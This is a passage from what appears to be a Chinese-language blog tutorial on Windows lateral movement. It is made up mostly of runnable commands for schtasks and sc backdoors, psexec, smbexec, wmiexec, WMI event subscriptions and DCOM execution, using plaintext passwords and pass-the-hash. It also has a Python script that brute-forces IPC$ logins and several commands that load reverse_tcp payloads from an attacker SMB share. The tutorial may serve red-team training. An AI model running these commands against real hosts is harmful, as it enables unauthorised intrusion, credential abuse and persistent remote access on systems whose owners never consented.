<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S <span class="number">192.168</span>.<span class="number">1.131</span> /TN Backdoor /<span class="built_in">SC</span> minute /MO <span class="number">1</span> /TR <span class="string">"c:\windows\system32\cmd.exe /c 'whoami' &gt; c:\users\public\result.txt"</span> /RN System /F</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">type</span> \\<span class="number">192.168</span>.<span class="number">1.131</span>\C<span class="variable">$</span>\users\public\result.txt</span><br><span class="line"><span class="built_in">copy</span> C:\Users\Administrator\Desktop\hack.bat \\<span class="number">192.168</span>.<span class="number">1.131</span>\c<span class="variable">$</span>\Windows\Temp</span><br><span class="line"></span><br><span class="line">schtasks /create /tn hack /tr C:\Windows\Temp\hack.bat /<span class="built_in">sc</span> ONSTART /s <span class="number">192.168</span>.<span class="number">1.131</span> /ru <span class="string">"system"</span> /u administrator /p <span class="number">123</span>qwe<span class="selector-tag">@</span></span><br><span class="line"></span><br><span class="line">schtasks /run /tn hackk /s <span class="number">192.168</span>.<span class="number">1.131</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">type</span> \\<span class="number">192.168</span>.<span class="number">1.131</span>\c<span class="variable">$</span>\Windows\Temp\result.txt</span><br><span class="line"></span><br><span class="line">schtasks /delete /s <span class="number">192.168</span>.<span class="number">1.131</span> /u administrator /p <span class="number">123</span>qwe<span class="selector-tag">@</span> /tn hackk /f</span><br></pre></td></tr></tbody></table></figure>

<p><strong>注意：在使用schtasks命令时，会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt。</strong></p>
<h3 id="UNC路径加载执行"><a href="#UNC路径加载执行" class="headerlink" title="UNC路径加载执行"></a>UNC路径加载执行</h3><p>Windows系统使用UNC路径来访问网络共享资源，格式为</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\\servername\sharename\directory\filename <span class="comment"># servername 服务器； sharename 网络共享名字</span></span><br></pre></td></tr></tbody></table></figure>

<p>攻击载荷在远程主机上时，可以直接使用UNC路径代替常规的本地路径，让目标主机直接在测试人员搭建的Smb共享中加载攻击载荷并执行。这样可以省去手动上传载荷的步骤。</p>
<p>例如：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S <span class="number">192.168</span>.<span class="number">1.131</span> /TN Backdoor /<span class="built_in">SC</span> minute /MO <span class="number">1</span> /TR \\<span class="number">192.168</span>.<span class="number">1.1</span>\mysmb\reverse_tcp.exe /RN System /F</span><br></pre></td></tr></tbody></table></figure>

<h3 id="sc（系统服务）"><a href="#sc（系统服务）" class="headerlink" title="sc（系统服务）"></a>sc（系统服务）</h3><p>创建远程服务需要拥有<strong>两端主机的管理员权限（要创建服务）</strong>和IPC连接，具体操作：</p>
<ol>
<li>利用已建立的共享连接向远程主机上传攻击载荷reverse_tcp.exe</li>
<li>利用已建立的IPC连接在远程主机上创建系统服务shell</li>
</ol>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sc</span> \\<span class="number">192.168</span>.<span class="number">1.131</span> create Backdoor binpath= <span class="string">"cmd.exe /k c:\users\public\reverse_tcp.exe"</span></span><br><span class="line"><span class="comment"># binpath的等号后面需要有一个空格</span></span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>删除服务shell</li>
</ul>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sc</span> \\<span class="number">192.168</span>.<span class="number">1.131</span> delete Backdoor</span><br></pre></td></tr></tbody></table></figure>

<h3 id="批量利用脚本、工具进行爆破连接"><a href="#批量利用脚本、工具进行爆破连接" class="headerlink" title="批量利用脚本、工具进行爆破连接"></a>批量利用脚本、工具进行爆破连接</h3><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#批量检测 IP 对应明文连接</span></span><br><span class="line"><span class="keyword">FOR</span> /F %%i <span class="keyword">in</span> (ips.txt) <span class="keyword">do</span> net use \\%%i\ipc<span class="variable">$</span> <span class="string">"admin!@#45"</span> /user:administrator</span><br><span class="line"></span><br><span class="line"><span class="comment">#批量检测 IP 对应明文 回显版</span></span><br><span class="line"><span class="keyword">FOR</span> /F %%i <span class="keyword">in</span> (ips.txt) <span class="keyword">do</span> atexec.exe ./administrator:admin!<span class="selector-tag">@</span><span class="comment">#45@%%i whoami</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#批量检测明文对应 IP 回显版</span></span><br><span class="line"><span class="keyword">FOR</span> /F %%i <span class="keyword">in</span> (pass.txt) <span class="keyword">do</span> atexec.exe ./administrator:%%i@<span class="number">192.168</span>.<span class="number">1.131</span> whoami</span><br><span class="line"></span><br><span class="line"><span class="comment"># 批量检测 HASH 对应 IP 回显版</span></span><br><span class="line"><span class="keyword">FOR</span> /F %%i <span class="keyword">in</span> (hash.txt) <span class="keyword">do</span> atexec.exe <span class="literal">-hashes</span> :%%i ./administrator@<span class="number">192.168</span>.<span class="number">1.131</span> whoami</span><br></pre></td></tr></tbody></table></figure>

<p>前期除了收集明文密码HASH等，还收集了用户名，用户名配合密码字典,用python打包成.exe可执行文件</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">pip install pyinstaller</span><br><span class="line">pyinstaller <span class="operator">-F</span> fuck_neiwang_001.py</span><br><span class="line">import os,time</span><br><span class="line">ips = {</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"><span class="comment"># net user /domain</span></span><br><span class="line">users = {</span><br><span class="line">	<span class="string">'Administrator'</span>,</span><br><span class="line">    <span class="string">'7BOB'</span>,</span><br><span class="line">    <span class="string">'uf9n1x'</span></span><br><span class="line">    <span class="string">'webserver-2008'</span></span><br><span class="line">    </span><br><span class="line">}</span><br><span class="line">passs = {</span><br><span class="line">    </span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> ip <span class="keyword">in</span> ips:</span><br><span class="line">	<span class="keyword">for</span> user <span class="keyword">in</span> users:</span><br><span class="line">        <span class="keyword">for</span> mima <span class="keyword">in</span> passs:</span><br><span class="line">            exec = <span class="string">"net use \\"</span> + ip + <span class="string">'\ipc$'</span> + mima + <span class="string">' /user:god\\'</span> + user</span><br><span class="line">            print(<span class="string">'---&gt;'</span> + exec + <span class="string">'&lt;---'</span>)</span><br><span class="line">            os.system(exec)</span><br><span class="line">            time.sleep(<span class="number">1</span>)</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304231725783.png" alt="img"></p>
<h1 id="SMB协议利用"><a href="#SMB协议利用" class="headerlink" title="SMB协议利用"></a>SMB协议利用</h1><h2 id="psexec"><a href="#psexec" class="headerlink" title="psexec"></a>psexec</h2><p>psExec是微软官方提供的一个Windows远程控制工具，可以根据凭据在远程系统上执行管理操作，并且可以获得与命令行几乎相同的实时交互性。该工具在MSF框架中也有集成。</p>
<p> psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口，只需要对方开启admin$共享 (该共享默认开启)。但是，假如目标主机开启了防火墙，psexec也是不能使用的，会提示找不到网络路径。由于PsExec是Windows提供的工具，所以杀毒软件将其列在白名单中。  </p>
<p><strong>PsExec的基本原理</strong>：</p>
<ul>
<li>通过ipc$连接，释放二进制文件psexecsvc.exe到目标</li>
<li>通过服务管理SCManager远程创建一个psexec服务，并启动服务</li>
<li>客户端连接执行命令，服务端通过服务启动相应的程序执行命令并回显数据</li>
<li>运行结束后删除服务</li>
</ul>
<p><strong>psexec的使用前提：</strong></p>
<ul>
<li>对方主机开启了 admin$ 共享，如果关闭了admin$共享，会提示：找不到网络名</li>
<li>对方未开启防火墙或放行445端口</li>
<li>如果是工作组环境，则必须使用administrator用户连接（因为要在目标主机上面创建并启动服务），使用其他账号(包括管理员组中的非administrator用户)登录都会提示访问拒绝访问。</li>
<li>如果是域环境，即可用普通域用户连接也可以用域管理员用户连接。连接普通域主机可以用普通域用户，连接域控只能用域管理员账户。</li>
</ul>
<p>用法：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">psexec.exe <span class="literal">-accepteula</span> \\<span class="number">192.168</span>.<span class="number">1.131</span> <span class="literal">-u</span> Administrator <span class="literal">-p</span> <span class="number">123</span>qwe<span class="selector-tag">@</span> <span class="literal">-s</span> cmd.exe </span><br><span class="line"><span class="comment"># -accepteula 禁止弹出许可证对话框 </span></span><br><span class="line"><span class="comment"># -s 以SYSTEM权限启动进程</span></span><br></pre></td></tr></tbody></table></figure>

<p>如果已经建立IPC连接，那么可以直接使用psexec连接远程主机</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">psexec.exe <span class="literal">-accepteula</span> \\<span class="number">192.168</span>.<span class="number">1.131</span> <span class="literal">-s</span> cmd.exe</span><br></pre></td></tr></tbody></table></figure>

<p> 或者不提取shell，直接用目标系统的cmd.exe的/c选项在目标主机上执行命令，并得到回显（与前面的at命令相似）</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PsExec.exe \\192.168.1.131 &lt;Command&gt;</span><br><span class="line">PsExec.exe \\192.168.1.131 cmd.exe /c "ipconfig"</span><br><span class="line">PsExec.exe \\192.168.1.131 -u Administrator -p 123qwe@ cmd.exe /c "ipconfig"</span><br></pre></td></tr></tbody></table></figure>

<h2 id="smbexec"><a href="#smbexec" class="headerlink" title="smbexec"></a>smbexec</h2><p><strong>无需先 ipc 链接</strong>， 明文或 hash 传递（第三方库）</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">smbexec uf9n1x/administrator:<span class="number">123</span>qwe<span class="selector-tag">@</span>@<span class="number">192.168</span>.<span class="number">1.131</span></span><br><span class="line">smbexec ./administrator:<span class="number">123</span>qwe<span class="selector-tag">@</span>@<span class="number">192.168</span>.<span class="number">1.131</span></span><br><span class="line">smbexec <span class="literal">-hashes</span> :<span class="variable">$HASH</span><span class="variable">$</span> ./admin@<span class="number">192.168</span>.<span class="number">1.131</span></span><br><span class="line">smbbexec <span class="literal">-hashes</span> :<span class="variable">$HASH</span><span class="variable">$</span> domain/admin@<span class="number">192.168</span>.<span class="number">1.131</span></span><br><span class="line">smbexec <span class="literal">-hashes</span> :<span class="number">518</span>b98ad4178a53695dc997aa02d455c ./administrator@<span class="number">192.168</span>.<span class="number">1.131</span></span><br><span class="line">smbexec <span class="literal">-hashes</span> :ccef208c6485269c20db2cad21734fe7 uf9n1x/administrator@<span class="number">192.168</span>.<span class="number">1.131</span></span><br></pre></td></tr></tbody></table></figure>

<h1 id="远程桌面调用"><a href="#远程桌面调用" class="headerlink" title="远程桌面调用"></a>远程桌面调用</h1><p>远程桌面协议（Remote Desktop Protocol，RDP）</p>
<p>查询注册表确定是否主机开启了远程桌面</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">reg query <span class="string">"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"</span> /v fDenyTSConnections </span><br><span class="line"><span class="comment"># 若字段值为0，则表示已启动RDP；若为1，则表示禁用RDP</span></span><br></pre></td></tr></tbody></table></figure>

<p>开启远程桌面</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 开启远程桌面 </span></span><br><span class="line">reg add <span class="string">"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"</span> /v fDenyTSConnections /t REG_DWORD /d <span class="number">0</span> /f </span><br><span class="line"><span class="comment"># 关闭“仅允许运行使用网络级别身份验证的远程桌面的计算机连接”（鉴权） </span></span><br><span class="line">reg add <span class="string">"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"</span> /v UserAuthentication /t REG_DWORD /d <span class="number">0</span>  </span><br><span class="line"><span class="comment"># 设置防火墙策略放行3389端口 </span></span><br><span class="line">netsh advfirewall firewall add rule name=<span class="string">"Remote Desktop"</span> protocol=TCP <span class="built_in">dir</span>=<span class="keyword">in</span> localport=<span class="number">3389</span> action=allow</span><br></pre></td></tr></tbody></table></figure>

<p>对于远程主机，可以通过WMI来开启远程桌面功能</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /Node:<span class="number">192.168</span>.<span class="number">1.131</span> /User:uf9n1x\Administrator /Password:<span class="number">123</span>qwe<span class="selector-tag">@</span> RDTOGGLE WHRER ServerName=<span class="string">'win2008'</span> call SetAllowTSConnections <span class="number">1</span></span><br></pre></td></tr></tbody></table></figure>

<h2 id="RDP-Hijack"><a href="#RDP-Hijack" class="headerlink" title="RDP Hijack"></a>RDP Hijack</h2><p>Windows系统下，<strong>tscon</strong>可被用来切换远程桌面的会话。正常情况下，切换会话时需要提供登录密码，但通过特殊的利用方法能够绕过验证，不输入密码实现未授权登录。</p>
<p>可以通过<strong>query user</strong>来列出所有登录的用户列表，得到id</p>
<p>在SYSTEM权限下，使用**tscon <id>**来切换用户不需要验证密码。</id></p>
<h2 id="sharp-RDP"><a href="#sharp-RDP" class="headerlink" title="sharp RDP"></a>sharp RDP</h2><p><a target="_blank" rel="noopener" href="https://github.com/0xthirteen/SharpRDP">https://github.com/0xthirteen/SharpRDP</a></p>
<p>sharp rdp可以通过远程桌面协议在远程主机上执行系统命令，且不需要GUI客户端。</p>
<p>工具需要远程主机开启远程桌面功能，且防火墙放行3389端口</p>
<h1 id="WMI的利用"><a href="#WMI的利用" class="headerlink" title="WMI的利用"></a>WMI的利用</h1><p>WMI（Windows Management Instrumentation，Windows管理规范）时一项核心的Windows管理技术。用户可以通过WMI管理本地和远程主机。</p>
<p>Windows为传输WMI数据提供了两个可用的协议：分布式组件对象模型（Distributed Component Object Model, DCOM）和Windows远程管理（Window Remote Management，WinRM）使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等操作都能远程运行。</p>
<p>在横向移动时，可以利用WMI提供的管理功能，通过以获取的用户凭据，与本地或远程主机进行交互，并控制其执行各种行为。目前两种常见的利用方法：<br>**1、 通过调用WMI的类方法进行远程调用，如Win32_Process类中的Create方法可以在远程主机上创建进程，Win32_Product类的Install方法可以在远程主机上安装恶意的MSI<br>**<strong>2、 远程部署WMI事件订阅，在特定事件发生时触发</strong></p>
<p>利用WMI进行横向移动需要具备以下条件：<br>**1、远程主机的WMI服务为开启状态（默认开启）<br>**<strong>2、远程主机防火墙放行135端口，这是WMI管理的默认端口</strong></p>
<h3 id="常规利用方法"><a href="#常规利用方法" class="headerlink" title="常规利用方法"></a>常规利用方法</h3><p>在windows上可以通过wmic.exe和powershell cmelet来使用wmi数据和执行WMI方法。<br>wmic.exe是一个与WMI进行交互的命令行工具，拥有大量的WMI对象的默认别名，可以执行许多复杂的查询。powershell也提供了许多可以与WMI进行交互的cmelet，如Invoke-WmiMethod、Set-WmiInstance等</p>
<p><strong>执行远程查询</strong></p>
<p>通过WMI查询远程主机上运行的进程信息</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:<span class="number">192.168</span>.<span class="number">1.131</span> /user:Administrator /password:<span class="number">123</span>qwe<span class="selector-tag">@</span> <span class="keyword">process</span> list brief <span class="comment"># /node 执行远程主机的地址</span></span><br></pre></td></tr></tbody></table></figure>

<p><strong>创建远程进程</strong><br>通过调用Win32_Process.Create方法在远程主机上创建进程，启动CMD来执行命令</p>
<p>由于WMIC在执行命令时没有回显，因此可以将执行结果写入文件，然后通过别的方式读取文件</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:<span class="number">192.168</span>.<span class="number">1.131</span> /user:Administrator /password:<span class="number">123</span>qwe<span class="selector-tag">@</span> <span class="keyword">process</span> call create <span class="string">"cmd.exe /c ipconfig &gt; C:\result.txt"</span></span><br></pre></td></tr></tbody></table></figure>

<p><strong>远程安装MSI文件</strong><br>通过调用Win32_Product.Install方法，可以控制远程主机安装恶意MSI文件，从而获得权限</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:<span class="number">192.168</span>.<span class="number">1.131</span> /user:Administrator /password:<span class="number">123</span>qwe<span class="selector-tag">@</span> product call install PackageLocation=<span class="string">"\\192.168.1.1\mysmb\reverse_tcp.msi"</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="常见利用工具"><a href="#常见利用工具" class="headerlink" title="常见利用工具"></a>常见利用工具</h3><h4 id="套件impacket-WmiExec"><a href="#套件impacket-WmiExec" class="headerlink" title="套件impacket-WmiExec"></a>套件impacket-<strong>WmiExec</strong></h4><p>Impacket项目的Wmiexec.py能够以全交互或半交互的方式，通过WMI在远程主机上执行命令。该工机需要远程主机开启135和445端口，其中445端口用于传输命令执行的回显。</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">python wmiexec.py uf9n1x/Administrator:<span class="number">123</span>qwe<span class="selector-tag">@</span>@<span class="number">192.168</span>.<span class="number">1.131</span> </span><br><span class="line"></span><br><span class="line">wmiexec.exe ./administrator:<span class="number">123</span>qwe<span class="selector-tag">@</span>@<span class="number">192.168</span>.<span class="number">1.131</span> <span class="string">"whoami"</span> </span><br><span class="line">wmiexec.exe god/administrator:Admin12345@<span class="number">192.168</span>.<span class="number">1.131</span> <span class="string">"whoami"</span> </span><br><span class="line">wmiexec.exe <span class="literal">-hashes</span> :<span class="number">518</span>b98ad4178a53695dc997aa02d455c ./administrator@<span class="number">192.168</span>.<span class="number">1.131</span> <span class="string">"whoami"</span> </span><br><span class="line">wmiexec.exe <span class="literal">-hashes</span> :ccef208c6485269c20db2cad21734fe7 uf9n1x/administrator@<span class="number">192.168</span>.<span class="number">1.131</span> <span class="string">"whoami"</span></span><br></pre></td></tr></tbody></table></figure>

<h4 id="自带-cscript-明文传递-有回显"><a href="#自带-cscript-明文传递-有回显" class="headerlink" title="自带 cscript 明文传递 有回显"></a>自带 cscript 明文传递 有回显</h4><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript //nologo wmiexec.vbs /shell <span class="number">192.168</span>.<span class="number">1.131</span> administrator <span class="number">123</span>qwe<span class="selector-tag">@</span></span><br></pre></td></tr></tbody></table></figure>

<h4 id="自带-WMIC-明文传递-无回显"><a href="#自带-WMIC-明文传递-无回显" class="headerlink" title="自带 WMIC 明文传递 无回显"></a>自带 WMIC 明文传递 无回显</h4><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:<span class="number">192.168</span>.<span class="number">1.131</span> /user:administrator /password:<span class="number">123</span>qwe<span class="selector-tag">@</span> <span class="keyword">process</span> call create <span class="string">"cmd.exe /c ipconfig &gt;C:\1.txt"</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="WMI事件订阅的利用"><a href="#WMI事件订阅的利用" class="headerlink" title="WMI事件订阅的利用"></a>WMI事件订阅的利用</h3><p>WMI提供了强大的事件处理系统，几乎可以用于操作系统上发生的任何事件做出相应。</p>
<p>当创建某进程时，通过WMI事件订阅器来执行预先设置的脚本。<br>其中触发事件的具体条件被称为“<strong>事件过滤器</strong>”（Event Filter），如用户登录、新进程创建等；对指定事件发生做出相应的称为“<strong>事件消费者</strong>”（Event Consumer），包括一系列具体的操作，如运行脚本、记录日志、发送邮件等。<br>在部署事件订阅时，需要分别构建Filter和Consumer两部分，并将两者绑定在一起。</p>
<p>所有的事件过滤器都被存储在一个<strong>Root\subscription:__EventFiilter</strong>对象的实例，可以通过创建**__EventFilter对象<strong>实例来部署事件过滤器。事件消费者是基于</strong>ROOT\subscription:__EventConsumer系统类**派生来的类。</p>
<p>系统提供了常用的标准事件消费类</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">LogFileEventConsumer    <span class="comment"># 将事件数据写入指定的日志文件 </span></span><br><span class="line">ActiveScriptEventConsumer  <span class="comment"># 执行嵌入的VBScript或JavaScript </span></span><br><span class="line">NTEventLogEventConsumer      <span class="comment"># 创建一个包含事件数据的事件日志条目 </span></span><br><span class="line">SMTPEventConsumer            <span class="comment"># 发送一封包含事件数据的电子邮件 </span></span><br><span class="line">CommandLineEventConsumer     <span class="comment"># 执行指定的系统命令</span></span><br></pre></td></tr></tbody></table></figure>

<p><strong>Sharp-WMIEvent</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/wh0Nsq/Sharp-WMIEvent">https://github.com/wh0Nsq/Sharp-WMIEvent</a></p>
<p>在远程主机上部署一个随即命名的永久事件订阅，并每隔60s执行以此SMB共享中的攻击载荷</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Sharp<span class="literal">-WMIEvent</span> <span class="literal">-Trigger</span> Interval <span class="literal">-IntervalPeriod</span> <span class="number">60</span> <span class="literal">-ComputerName</span> <span class="number">192.168</span>.<span class="number">1.131</span> <span class="literal">-Domain</span> uf9n1x.com <span class="literal">-Username</span> Administrator <span class="literal">-Password</span> <span class="number">123</span>qwe<span class="selector-tag">@</span></span><br></pre></td></tr></tbody></table></figure>



<h1 id="DCOM的利用"><a href="#DCOM的利用" class="headerlink" title="DCOM的利用"></a>DCOM的利用</h1><p>COM（Component Object Model，组件对象模型）是微软的一套软件组成的二进制接口标准，使得跨编程语言的进程间通信、动态对象创建成为可能。COM指定了一个对象模型和编程要求，使COM对象能够与其他对象交互。这些对象可以在单个进程中，也可以在其它进程中，甚至可以在远程计算机中。在Windows中，每个COM对象都由唯一的128位的二进制标识符标识，即GUID。</p>
<p>DCOM（Distracted Component Model，分布式组件对象模型）是基于COM的一系列概念和程序接口，支持不同机器上的组件间通信。利用DCOM，客户端程序对象可以请求来自网络中另一台计算机上的服务器程序对象。</p>
<p>部分DCOM组件公开的接口中可能包含不安全的方法。执行以下命令，可以列出计算机上所有的DCOM程序组件</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Get-CimInstance</span> Win32_DCOMApplication</span><br></pre></td></tr></tbody></table></figure>

<p>目前常利用的DCOM组件有：MMC20.Application、ShellWindows、Excel.Application、ShellBrowserWindow等。</p>
<p>使用DCOM在远程主机上面执行命令，需要具有以下条件：</p>
<ul>
<li><strong>具有管理员权限的PowerShell</strong></li>
<li><strong>可能需要关闭目标系统的防火墙。</strong></li>
<li><strong>在远程主机上执行命令时，必须使用域管的administrator账户或者目标主机具有管理员权限的账户</strong></li>
</ul>
<h2 id="MMC20-Application"><a href="#MMC20-Application" class="headerlink" title="MMC20.Application"></a>MMC20.Application</h2><p>MMC20.Application对象的Document.ActiveView下存在一个ExecuteShellCommand方法，可以用来启动子进程并运行执行的程序或系统命令。</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过progID与DCOM进行远程交互，并创建MMC20.Application对象的示例 </span></span><br><span class="line"><span class="variable">$com</span> =[<span class="type">activator</span>]::CreateInstance([<span class="type">type</span>]::GetTypeFromProgID(<span class="string">"MMC20.Application"</span>,<span class="string">"192.168.1.131"</span>)) </span><br><span class="line"></span><br><span class="line"><span class="comment"># 调用ExecuteShellCommand方法启动进程，运行攻击载荷 $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c \\192.168.1.1\mysmb\reverse_tcp.exe", "Minimized") </span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 合并一句话 [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.131")).Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c \\192.168.1.1\mysmb\reverse_tcp.exe", "Minimized")</span></span><br></pre></td></tr></tbody></table></figure>

<h2 id="ShellWindows"><a href="#ShellWindows" class="headerlink" title="ShellWindows"></a>ShellWindows</h2><p>ShellWindows组件提供了Document.Application.ShellExecute方法，适用于Windows7及以上的系统。</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过PowerShell与DCOM进行远程交互，创建ShellWindows对象的实例: </span></span><br><span class="line"><span class="variable">$com</span>=[<span class="type">Activator</span>]::CreateInstance([<span class="type">Type</span>]::GetTypeFromCLSID(<span class="string">'9BA05972-F6A8-11CF-A442-00A0C90A8F39'</span>,<span class="string">"192.168.1 .131"</span>)) </span><br><span class="line"></span><br><span class="line"><span class="comment"># 然后执行如下命令，我们就可以调用该对象的"ShellExecute"方法在远程主机上启动进程: $com.item().Document.Application.ShellExecute("cmd.exe","/c C:\shell.exe","c:\windows\system32",$null,0) </span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 完整的命令: </span></span><br><span class="line">[<span class="type">Activator</span>]::CreateInstance([<span class="type">Type</span>]::GetTypeFromCLSID(<span class="string">'9BA05972-F6A8-11CF-A442-00A0C90A8F39'</span>,<span class="string">"192.168.1.131"</span>)).item().Document.Application.ShellExecute(<span class="string">"cmd.exe"</span>,<span class="string">"/c C:\shell.exe"</span>,<span class="string">"c:\windows\system32"</span>,<span class="variable">$null</span>,<span class="number">0</span>)</span><br></pre></td></tr></tbody></table></figure>

<h3 id="Excel-Application"><a href="#Excel-Application" class="headerlink" title="Excel.Application"></a>Excel.Application</h3><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过PowerShell与DCOM进行远程交互，创建Excel.Application对象的实例: </span></span><br><span class="line"><span class="variable">$com</span> = [<span class="type">activator</span>]::CreateInstance([<span class="type">type</span>]::GetTypeFromprogID(<span class="string">"Excel.Application"</span>,<span class="string">"192.168.1.131"</span>)) </span><br><span class="line"><span class="variable">$com</span>.DisplayAlerts = <span class="variable">$false</span> </span><br><span class="line"></span><br><span class="line"><span class="comment"># 然后执行如下命令，我们就可以调用该对象的"DDEInitiate"方法在远程主机上启动进程: $com.DDEInitiate("cmd.exe","/c C:\shell.exe")</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="ShellBrowserWindow"><a href="#ShellBrowserWindow" class="headerlink" title="ShellBrowserWindow"></a>ShellBrowserWindow</h3><p>使用条件：适用于<strong>Windows 10和Windows Server 2012 R2</strong>等版本的系统。</p>
